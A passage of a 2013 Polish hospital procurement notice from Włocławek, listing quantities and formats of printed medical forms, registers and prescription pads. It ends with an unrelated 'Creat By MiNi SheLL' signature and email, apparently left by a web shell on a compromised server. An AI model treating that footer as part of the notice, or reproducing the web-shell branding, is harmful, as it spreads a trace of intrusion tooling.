    wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny   im. błogosławionego księdza Jerzego Popiełuszki we Włocławku  ul. Wieniecka 49, 87-800 Włocławek. Budynek administracji-pokój nr 304..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2013 godzina 10:30, miejsce: Wojewódzki Szpital Specjalistyczny  im. błogosławionego księdza Jerzego Popiełuszki we Włocławku ul. Wieniecka 49, 87-800 Włocławek. Budynek administracji-pokój nr 304..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.  Druki różne:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa druku	Ilość	Format
 	Historia Choroby	Ogólna        (1 bl  - 100 szt.)	250	A3x2
		Ginekologiczna ( 1 bl -100 szt.)	12	A3
		Karta położnicza ( 1 bl -100 szt.)	50	A3
		Poradni + wkładka ( 1 bl -100 szt.)	100	42cm /15cm +A5x 2
 	Karta Gorączkowa	Ogólna  ( 1 bl -100 szt.)	200	A4 x 2
		Niemowlęcia ( 1 bl -100 szt.)	20	A3 x 2
 	Indywidualna karta zleceń lekarskich ( 1 bl -100 szt.)	200	A4 x 2
 	Karta Indywidualnej Pielęgnacji ( 1 bl -100 szt.)	150	A3 x 2
 	Wkładka do Karty Indywidualnej Pielęgnacji   ( 1 bl -100 szt.)	50	A4 x 2
 	Wkładka do historii choroby ogólna ( 1 bl -100 szt.)	50	A4 x 2
 	Wkładka do historii choroby neurologiczna ( 1 bl -100 szt.)	20	A4 x 2
 	Wkładka do historii choroby neurochirurgiczna ( 1 bl -100 szt.)	5	A3 x 2
 	Wkładka do historii choroby urologiczna ( 1 bl -100 szt.)	10	A3 x 2
 	Wkładka do historii choroby okulistyczna ( 1 bl -100 szt.)	10	A3 x 2
 	Wkładka do historii choroby gin-poł + noworod - przyjęcie do szpitala
 ( 1 bl -100 szt.)	10	A4
 	Karta obserwacji porodu ( 1 bl -100 szt.)	20	A3 x 1
 	Karta obserwacji położnej i lekarza ( 1 bl -100 szt.)	30	A4 x 2
 	Karta statystyczna  szpitalna ogólna ( 1 bl -100 szt.)	170	A4 x 2
 	Karta Przyjęć SAMOKOPIUJĄCA ( 1 bl -100 szt.)	80	A4 x 1
 	Karta cukrzycowa ( 1 bl -100 szt.)	80	A4 x 1
 	Karta obserwacji ( 1 bl -100 szt.)	60	A4 x 1
 	Karta bilansu ( 1 bl -100 szt.)	50	A4 x 1
 	Karta skierowania zwłok do chłodni ( 1 bl -100 szt.)	5	A6 x1
 	Karta sekcyjna ( 1 bl -100 szt.)	3	A6 x 2
 	Karta statystyczna do karty zgonu ( 1 bl -100 szt.)	5	A4 x 2
 	Prośba o zwolnienie z sekcji zwłok ( 1 bl -100 szt.)	3	A4 x 1
 	Karta badania histopatologicznego ( 1 bl -100 szt.)	30	A5 x 2
 	Indywidualna karta rejestracji zakażenia zakładowego ( 1 bl -100 szt.)	30	A4 x 1
 	Karta znieczulenia ( 1 bl -100 szt.)	40	A4 x 1
 	Indywidualna karta obserwacji pacjenta zagrożonego powstaniem odleżyn i podjętych działań profilaktyczno - leczniczych ( 1 bl -100 szt.)	20	A4 x 1
	Indywidualna Karta Obserwacji  Miejsca Operowanego ( 1 bl. - 100 szt.)	30	A4 x 2
	Karta Obserwacji Wkłucia Obwodowego ( 1 bl. -100 szt.)	30	A4x 2
 	Skierowanie do poradni specjalistycznej ( 1 bl -100 szt.)	120	A4 x 1
 	Skierowanie do szpitala ( 1 bl -100 szt.)	100	A4 x 1
 	Skierowanie do Zakładu Radiologii ( 1 bl -100 szt.)	12	A5 x 2
 	Skierowanie na badanie TK ( 1 bl -100 szt.)   SAMOKOPIUJĄCE	80	A4 x 1
 	Skierowanie na badanie MRI ( 1 bl -100 szt.)	10	A4 x 1
 	Skierowanie na badanie grupy krwi ( 1 bl -100 szt.)	20	A5 x 1
 	Zamówienie na krew i jej składniki ( 1 bl -100 szt.)	20	A5 x 1
 	Skierowanie na wykonanie próby zgodności ( 1 bl -100 szt.)	20	A5 x 1
	Wynik próby zgodności krwi ( 1 bl. - 100 szt. )	10	A5 x 1
	Wynik badania grupy krwi  ( 1 bl. - 100 szt. )	10	A5 x 1
 	Zlecenie badania mikrobiologicznego ( 1 bl -100 szt.)	30	A5 x 1
 	Zaświadczenie lekarskie ( 1 bl -100 szt.)	50	A6 x 1
 	Zlecenie na transport sanitarny ( 1 bl -100 szt.)	50	A5 x 1
 	Zestawienie dzienne oddziału ( 1 bl -100 szt.)	40	14cm / 29,5cm x 2
 	Książka	Raportów pielęgniarskich
( 1 książka - 100 kartek)	800	A4
		Operacji  ( 1 książka - 100 kartek)	20	A4
		Przyjęć ambulatoryjnych
( 1 książka - 100 kartek)	40	A4
		Ruchu chorych ( 1 książka - 100 kartek)	50	A4
		Wartości krytycznych badań  laboratoryjnych	5	A4
		Ruchu chorych dla poradni
( 1 książka - 100 kartek)	20	A4
		Transfuzji ( 1 książka - 100 kartek)	20	A4
		Porodów ( 1 książka - 100 kartek)	30	A4
		Ewidencji noworodków
( 1 książka - 100 kartek)	5	A4
		Paszport techniczny	200	A5/ 16 str./
		Księga Inwentarzowa	20	A4
 	Księga Główna Przyjęć do Szpitala ( 1 książka -100 kartek)	10	A3
 	Ewidencja czasu pracy	B ( 1 bl -100 szt.)	80	A4 x 2
 	Wniosek o urlop ( 1 bl -100 szt.)	30	A6 x 2
 	Harmonogram czasu pracy piel./poł./tech. ( 1 bl -100 szt.)	15	14cm / 29,5 cm x 1
 	Magazyn Wyda ( 1 bl -100 szt.) SAMOKOPIUJĄCE	500	A5 x 1
	Przyjęcie środka trwałego OT ( 1bl. - 100 szt.) SAMOKOPIUJĄCE	3	A5 x 1
 	Skierowanie na badania EEG ( 1 bl -100 szt.)	5	A5 x 1
 	Skierowanie na krew do pilnej transfuzji ( 1 bl -100 szt.)	20	A4 x 1
 	Zlecenie na zaopatrzenie w przedmioty ortopedyczne i środki pomocnicze
( 1 bl -100 szt.)	20	A4 x 1
 	Formularz zgłoszenia zachorowania na chorobę zakaźną  ( 1 bl -100 szt.)	5	A4 x 1
 	Karta zgłoszenia nowotworu ( 1 bl -100 szt.)	5	A4 x 2
 	Skierowanie na zabiegi rehabilitacyjne ( 1 bl -100 szt.)	5	A5 x 1
 	Informacja dla lekarza kierującego ( 1 bl -100 szt.)	25	A4 x 1
 	Karta zleceń lekarskich OIOM ( 1 bl -100 szt.)	30	A4 x 2
 	Karta obserwacji OIOM ( 1 bl -100 szt.)	30	A3 x 2
 	Karta zapobiegania i leczenia odleżyn OIOM ( 1 bl -100 szt.)	10	A3 x 2
	Ankieta Anestezjologiczna / Zgoda na wykonanie znieczulenia ( 1 bl. - 100 szt. )	60	A4 x 2
	Informacja O Znieczuleniu ( 1 bl. - 100 szt. )	60	A4 x 1
	Zaświadczenie o pobycie szpitalnym ( 1 bl -100 szt.)	10	A6 x 1
 	Historia rozwoju noworodka ( 1 bl -100 szt.)	30	A4 x 1
 	Karta zdrowia dziecka ( 1 bl -100 szt.)	30	A3 42cm/15 cm x 2
 	Karta uodpornienia ( 1 bl -100 szt.)	30	A4 x 2 karton
 	Historia rozwoju noworodka - poradnia ( 1 bl -100 szt.)	10	A4 x 1
 	Wkładka do historii  rozwoju noworodka - poradnia ( 1 bl -100 szt.)	10	A5 x 2
 	Protokół Operacyjny ( 1 bl -100 szt.)   SAMOKOPIUJĄCY	100	A4
	Protokół Operacyjny SOG ( 1 bl. - 100 szt. )	20	A4 układ poziomy
	Skorowidz do księgi głównej  z alfabetem ( 1 bl. -100 szt.)	15	15 cm x 28 cm
	Dziennik Ruchu Chorych Oddziału ( 1 bl. - 100 szt.)	30	A4
	Księga Oczekujących na przyjęcie do Szpitala ( 1 bl. - 100 szt.)	30	A4
	Karta do skorowidza poradni Zdrowia Psychicznego i Poradni Odwykowej
( 1bl - 100 szt.)	1	10,5 cm x7,5 cm x 2 / karton
	Poradnia ( 1 bl - 100 szt.)	3	10,5 cm x 10 cm x 2/ karton
	Karta ewidencyjna pacjenta poradni  psychiatrycznej / odwykowej
( 1 bl - 100 szt.)	2	A5 x 2
	Zaświadczenie o leczeniu w Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.) SAMOKOPIUJĄCY	30	A4 x 1
	Historia Choroby Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.) SAMOKOPIUJĄCY	4	A3 x2
	Wkładka do Historii Poradni Zdrowia Psychicznego ( 1 bl. - 100 szt.)	6	A4 x 2
	Stan Obecny ( 1 bl. - 100 szt.)	4	A3 x 2
	Skierowanie do Pracowni Elektroenecfalograficznej  ( 1 bl. - 100 szt.)	1	A4 x 1
	Skierowanie do Szpitala Psychiatrycznego ( 1bl. - 100 szt.)	4	A4 x 2
	Karta Przebiegu Stosowania Przymusu ( 1 bl. -  100 szt.)	10	A4 x 1
	Skierowanie do Szpitala ( 1 bl. - 100 szt. )	50	A6 x 1
	Oświadczenie pacjenta o zgodzie na badanie ( 1 bl. - 100 szt.)	100	A5 x 1
	Oświadczenie pacjenta o zgodzie na badanie ( dotyczy dziecka )
( 1bl. - 100 szt.)	50	A5x 1
	Wkładka do Historii Choroby  ( 1 bl. - 100 szt.)	100	A5x2
	Informacja dla lekarza kierującego ( 1 bl. - 100 szt.)  SAMOKOPIUJĄCY	200	A4x1
	Zlecenie Badania Mikrobiologicznego ( 1 bl. - 100 szt.)	5	A5 x1
	Skierowanie na badanie RTG/USG ( 1 bl. - 100 szt.)	4	A5x2
	Skierowanie na badanie TK ( 1 bl. - 100 szt.)	2	A4x 2
	Oświadczenie o prawie do św. Op. zdr. Składane przez opiekuna
( 1 bl. - 100 szt.)	4	A4x1
	Oświadczenie o ubezpieczeniu pacjenta ( dziecka) ( 1 bl. - 100 szt.)	2	A4x1
	Zlecenie na transport sanitarny ( 1 bl. - 100 szt.)	2	A4x1
	Karta zlecenia wyjazdu zespołu ratownictwa medycznego ( 1 bl. - 100 szt.)	500	A4
	Karta Medycznych Czynności ratunkowych wzór Nr 1( 1 bl. - 100 szt.)    SAMOKOPIUJĄCE	1000	A4
	Karta Medycznych Czynności ratunkowych wzór Nr 2 ( 1 bl. - 100 szt.)   SAMOKOPIUJĄCE	500	A4
	Zlecenie Wyjazdu ( 1 bl. - 100 szt.)	160	A5x2
	Karta Informacyjna ( 1 bl.- 100 szt.)  SAMOKOPIUJĄCE	30	A5 x1
	Karta Statystyczna do Karty Zgonu ( 1bl. - 100 szt.)	4	A4 x2
	Zgłoszenie Urodzenia Noworodka ( 1 bl. - 100 szt.)	20	A4x2
	Przepustka na wjazd do Szpitala  ( 1 bl. - 100 szt.)	5	8,5 cm x 5,5 cm x 2 / karton kolor niebieski
	Protokół przekazania do CS ( 1 bl- 100 szt.) SAMOKOPIUJĄCE	80	A5
	Protokół przekazania do CS ( 1 bl. - 100 szt.)  SAMOKOPIUJĄCE	50	A4
	Subiektywna globalna ocena stanu odżywiania  ( 1 bl. - 100 szt.)	5	A4 x 1
	Zapotrzebowanie C ( 1 bl. - 100 szt.) SAMOKOPIUJĄCE	200	A5
	Zapotrzebowanie L ( 1 bl. - 100 szt.) SAMOKOPIUJĄCE	150	A4
	Karta wywiadu epidemiologicznego ( 1 bl. - 100 szt.)	250	A4 x1
	Karta kwalifikacji do żywienia pozajelitowego lub dojelitowego / Karta metaboliczna    ( 1 bl. - 100 szt.)	5	A4 x 2
	Karta żywienia pozajelitowego ( 1. bl. - 100 szt.)	5	A4 x 1
	Ocena ryzyka związanego ze stanem odżywienia ( 1 bl. - 100 szt.)	5	A4 x 1
	Konsultacje lekarskie ( 1bl. - 100 szt.) SAMOKOPIUJĄCE	30	A4
	Informacja dla Pacjentki oraz Formularz Świadomej Zgody na Operacyjne Rozwiązanie Ciąży Metodą Ciecia Cesarskiego ( 1 bl. - 100 szt.)	6	A4x2  i A4 x 1
	Przebieg Porodu ( 1 bl. - 100 szt.)	20	A4 x 2
	Zgoda na Zabieg Operacyjny Ginekologiczny  ( 1 bl. - 100 szt.)	20	A4 x 1
	Karta Zabiegu Inwazyjnego ( 1 bl. - 100 szt.)	26	A4x1
	Diagnostyka ( 1 bl. - 100 szt. )	26	A4 x 2
	Świadoma Zgoda Pacjenta na Wykonanie Zabiegu Lekarskiego ( 1 bl. - 100 szt.)	15	A4x2
	Skala NIH/Rankina/Oxfordshire ( 1 bl. - 100 szt.)	6	A4x 2


Legenda:

1.	A3 x 1 - format A3 drukowany jednostronnie,
2.	A4 x 2 - format A4 drukowany dwustronnie,
3.	A5 x 1 - format A5 drukowany jednostronnie,
4.	A6 x 2 -format A6 dwustronnie,
5.	A3 42cm/15 cm x 2 - format A3 długość / szerokość drukowany dwustronnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. RECEPTY:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa druku	Ilość bloczków 	Format
Recepty   ( 1 bl.-100 szt .)	1300	99 mm/ 210mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com